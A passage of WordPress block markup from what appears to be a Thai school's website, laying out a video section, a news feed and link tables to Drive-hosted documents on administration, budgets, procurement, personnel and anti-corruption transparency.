href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"b0641f20\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":260,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" class=\"wp-image-260\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"9a3f4403\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"c36e8900\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 